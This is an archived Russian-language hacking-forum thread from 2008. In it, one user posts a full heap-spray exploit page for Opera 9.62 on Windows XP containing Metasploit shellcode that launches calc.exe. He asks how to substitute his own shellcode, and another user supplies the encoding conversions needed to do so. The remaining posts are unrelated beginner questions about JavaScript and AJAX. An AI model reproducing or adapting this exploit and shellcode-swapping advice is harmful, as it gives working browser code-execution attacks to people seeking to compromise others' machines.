ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.12.2008, 14:58
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от barman
если так писать
Код:
var code = '\x66\x81\xec\x80.....';
то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть Шеллкод и эксплоит - это не одно и то же.
|
|
|
09.12.2008, 15:17
|
|
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме:
25363
Репутация:
0
|
|
так я и хочу узнать как етот код в експлоит засунуть, вместо запуска калькулятора
Код:
<html> <head><title>uh?</title></head> <body> <script> // k`sOSe 11/15/2008 // tested on Windows XP SP3, opera 9.62 international version // vulnerability found by send9 // there are many ways to achieve code execution, tons of function pointers to overwrite. // maybe there's one more reliable... var i=0; // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); while (block.length < 81920) block += block; var memory = new Array(); for (;i<1000;i++) memory[i] += (block + shellcode); var evil = "file://"; for(var i = 0; i<16438; i++) evil += "X"; evil += "R."; window.location.replace(evil); </script> </body> </html>
,
шелкод есть но в таком формате
Код:
\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3
он не выполняется
Последний раз редактировалось barman; 09.12.2008 в 15:21..
|
|
|
|
09.12.2008, 17:58
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме:
668329
Репутация:
106
|
|
используется javascript.
есть 10 файлов htm - в каждом одна новость (заголовок и текст).
можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?
возможно ли вывести заголовки новостей на другую страницу, при нажатии на которые открывались бы сами новости?
интересует возможно ли такое сделать на javascript без php и mysql.
|
|
|
|
09.12.2008, 18:22
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960
Репутация:
468
|
|
да можно, аяксом=)
|
|
|
|
09.12.2008, 18:39
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме:
668329
Репутация:
106
|
|
если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.
чтобы ajax работал, нужно ставить сервер?
|
|
|
|
09.12.2008, 18:56
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от UnPazz
если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.
чтобы ajax работал, нужно ставить сервер?
Должно быть что-то, способное отдавать данные.
можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?
Надо бы показывать хотя бы то, что получилось.
|
|
|
|
09.12.2008, 19:30
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960
Репутация:
468
|
|
Сообщение от UnPazz
если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.
чтобы ajax работал, нужно ставить сервер?
не нужно ставить сервер, аякс это джаваскриптовая фишка. вечером отпишу подробнее=)
|
|
|
|
09.12.2008, 19:49
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от life_is_shit
не нужно ставить сервер, аякс это джаваскриптовая фишка. вечером отпишу подробнее=)
PHP код:
interface XMLHttpRequest {
// event handler
attribute EventListener onreadystatechange;
// state
const unsigned short UNSENT = 0;
const unsigned short OPENED = 1;
const unsigned short HEADERS_RECEIVED = 2;
const unsigned short LOADING = 3;
const unsigned short DONE = 4;
readonly attribute unsigned short readyState;
// request
void open(in DOMString method, in DOMString url);
void open(in DOMString method, in DOMString url, in boolean async);
void open(in DOMString method, in DOMString url, in boolean async, in DOMString user);
void open(in DOMString method, in DOMString url, in boolean async, in DOMString user, in DOMString password);
void setRequestHeader(in DOMString header, in DOMString value);
void send();
void send(in DOMString data);
void send(in Document data);
void abort();
// response
DOMString getAllResponseHeaders();
DOMString getResponseHeader(in DOMString header);
readonly attribute DOMString responseText;
readonly attribute Document responseXML;
readonly attribute unsigned short status;
readonly attribute DOMString statusText;
};
Подробнее не бывает
|
|
|
|
09.12.2008, 18:43
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
вот примерно такое соответствие
Код:
'\x66'
'\u0066'
decodeURI('%66')
unescape('%u0066')
String.fromCharCode(0x66)
decodeURIComponent('%66')
|
|
|
|
09.12.2008, 19:05
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме:
668329
Репутация:
106
|
|
скоро покажу.
а можно форму отправить по email без php и без использования email клиента на стороне клиента? чтобы внешне было как обычная форма?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид